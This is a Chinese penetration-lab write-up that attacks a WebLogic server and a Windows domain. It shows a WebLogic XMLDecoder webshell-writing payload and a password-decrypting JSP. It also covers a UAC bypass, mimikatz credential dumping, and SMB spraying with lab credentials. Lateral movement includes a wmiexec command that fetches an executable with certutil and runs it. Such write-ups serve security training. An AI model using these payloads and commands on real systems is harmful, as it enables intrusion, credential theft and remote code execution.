内网靶场-2

内网靶场-2

1 靶场信息

1
目标ip:10.10.0.102

2 渗透路径

2.1 信息收集

  • ip端口探测
1
2
3
4
5
6
7
8
9
10
11
12
.\mx1014.exe -t 100 -T 500 10.10.0.102
# 2025/02/17 20:25:04 Start scanning 1 hosts... (reqs: 346)

10.10.0.102:80             (in,iis,rce,jboss,web2,web1)
10.10.0.102:445            (brute,win,in,rce,smb)
10.10.0.102:3389           (rdp,brute,win,in)
10.10.0.102:135            (win,in,msrpc,info)
10.10.0.102:139            (brute,win,netbios,in,rce,info,smb)
10.10.0.102:7001           (in,web2,weblogic)

# 2025/02/17 20:25:06 Finished 346 tasks.
# up: 100% (1/1), discard: 0, open: 6, pps: 170, time: 2s
  • 端口扫描发现7001端口,web服务,标记是weblogic服务。finger -mdir参数主动尝试识别指纹,除了weblogic,未发现其他特征信息。
  • ffuf目录探测,发现weblogic后台路径,因已weblogic为入口点。
1
2
3
4
5
./finger.exe -u http://10.10.0.102:7001 -mdir

./ffuf.exe -c  -recursion  -recursion-depth 2   -o 1.html -of html -t 25 -ac -v -w .\onelistforallmicro.txt -u http://10.10.0.102:7001/FUZZ



finger识别:

ffuf目录探测:

2.2 默认口令登录尝试

  • weblogic后台路径,尝试默认口令登录,登录失败。
1
2
3
/console/login/LoginForm.jsp  

weblogic / weblogic

示:

2.3 漏洞利用写入webshell

  • 漏洞探测,发现存在CVE-2017-3506、CVE-2020-2551、CVE-2020-14882等漏洞。

示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: xxx
Connection: close
Content-Length: 3287
Upgrade-Insecure-Requests: 1
Content-Type:text/xml


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
         <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter"> 
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/uploasd.jsp</string><void method="println">
                        <string><![CDATA[  webshell内容  ]]></string></void><void method="close"/>
                    </object>
            </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
</soapenv:Envelope>

2.4 权限获取,寻找配置文件

  • weblogic配置文件,weblogic配置文件通常在
1
***/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml

获取到password加密密码后,上传解密jsp脚本,解密。

示:配置文件路径

  • 解密脚本放在网站路径下
1
**/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/
  • u.jsp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<%@page pageEncoding="utf-8"%>
<%@page import="weblogic.security.internal.*,weblogic.security.internal.encryption.*"%>
<%
   EncryptionService es = null;
   ClearOrEncryptedService ces = null;
    String s = null;
    s="{AES}b68tztprlWzCxxDnh0sNPQHu0NiUMendEcpBi1XVeFU=";
    es = SerializedSystemIni.getEncryptionService();
    if (es == null) {
       out.println("Unable to initialize encryption service");
        return;
    }
    ces = new ClearOrEncryptedService(es);
    if (s != null) {
        out.println("\nDecrypted Password is:" + ces.decrypt(s));
    }
%>

示:解密成功

2.5 web服务器-C2上线

‌‌‌‌  通过godzilla,java内存加载cobaltstike上线。机器不存在杀软,非管理员上线,双网卡:10.10.10.80、10.10.0.102。

‌‌‌‌ 先提升UAC提升下权限。win server 2008 UAC提权使用eventvwr服务提权。提权后mimikaz将密码凭证提取一下。

1
SharpBypassUAC.exe -b eventvwr -e QzpcUHJvZ3JhbURhdGFcV2luU3hTXGNhcnNzLmV4ZQ==

示:提权成功

示:密码凭证提取

2.6 ‌内网端口探测

‌‌‌‌ 端口扫描10.10.10.0/24网段,发现10和201两个地址,开放3389和445端口,准备尝试将之前获取到密码和一些弱口令进行爆破。

1
2
3
4
5
6
7
8
9
10
11
12
10.10.10.80:80             (in,web1,rce,web2,iis,jboss)
10.10.10.10:445            (in,win,smb,rce,brute)
10.10.10.80:445            (in,win,smb,rce,brute)
10.10.10.201:445           (in,win,smb,rce,brute)
10.10.10.10:3389           (in,win,brute,rdp)
10.10.10.80:3389           (in,win,brute,rdp)
10.10.10.201:3389          (in,win,brute,rdp)
10.10.10.10:389            (in,win,brute,ldap)
10.10.10.10:135            (in,info,win,msrpc)
10.10.10.80:135            (in,info,win,msrpc)
10.10.10.201:135           (in,info,win,msrpc)
。。。。

‌‌‌‌ 先搭建个soscks5代理,方便后续密码爆破,有web服务器,直接使用sou5搭建隧道。隧道搭建好,将网段10.10.10.*进行全局代理到本地。

示:sou5隧道搭建

示:全局代理

‌‌‌‌  根据获取到的密码信息,密码爆破。2台机器成功登录,进行psexec横向上线。

1
2
3
4
webloigc / 1qaz@WSX   //weblogic解密获取
de1ay / C3ting@2024  //10.10.10.80机器,mimikatz提取

fscan -h  10.10.10.201,10.10.10.10 -np -p 445 -m smb -user "administrator,webloigc,de1ay" -pwd "C3ting@2024,1qaz@WSX"

示:

2.7 DC域控上线

‌‌‌‌ 在目标列表手动添加目标,同时添加爆破到的账号密码凭证,生成smb监听器,psexec64位横向上线机器。

示:添加目标

示:添加账号密码凭证

示:psexec64横向上线

‌‌‌‌ 只有10.10.10.10机器上线,10.10.10.201未成功上线。根据内网探测的端口,尝试直接3389远程登录服务器10.10.10.201:3389。一直提示用户密码错误,但是在smb登录账号密码是正确的(未知原因).

2.8 201机器-3389手动登录成功

通过加上域的域名,de1ay.com\administrator 才可以登录成功。

‌‌

1
de1ay.com\administrator  / 1qaz@WSX

示:登录失败

示:增加域名登录

示:

  • 之前操作中,是通过wmiexec执行远程执行命令,将正向木马的shell,上传到在入口点的机器上,通过certutil下载正向木马,直接连接上线。(中间360未进行拦截,当前机器是win7,没有用户在线情况下,即桌面处于注销状态下,360未进行拦截???
1
2
3
4
5
6
./wmiexec.exe administrator:"1qaz@WSX"@10.10.10.201  "ipconfig" 


./wmiexec.exe administrator:"1qaz@WSX"@10.10.10.201  "certutil -urlcache -split -f http://10.10.10.80/wls-wsat/16338.exe C:\ProgramData\micr.exe && cmd /c C:\ProgramData\micr.exe" 

connect 10.10.10.201 16338  //c2上线

‌‌‌‌  环境中的360,最简单的方式,由于已经通过3389连接上去了,直接就可以关闭360防护。机器可出网,直接公网http上线

示:关闭360手动上线

3 结束

‌‌‌‌ 靶场结束,有几个问题点。

  1. 201的机器无法使用psexec横向上线,明明wmiexec可以执行命令,并且smb登录也可以成功的。
  2. 201的机器,为什么在未进行administrator登录的情况下,可以绕过防护,使用wmiexec,远程登录administrator账号后,在使用wmiexec会被拦截。
  3. 201的机器,为什么远程3389登录需要指定de1ay.com域名才能登录,smb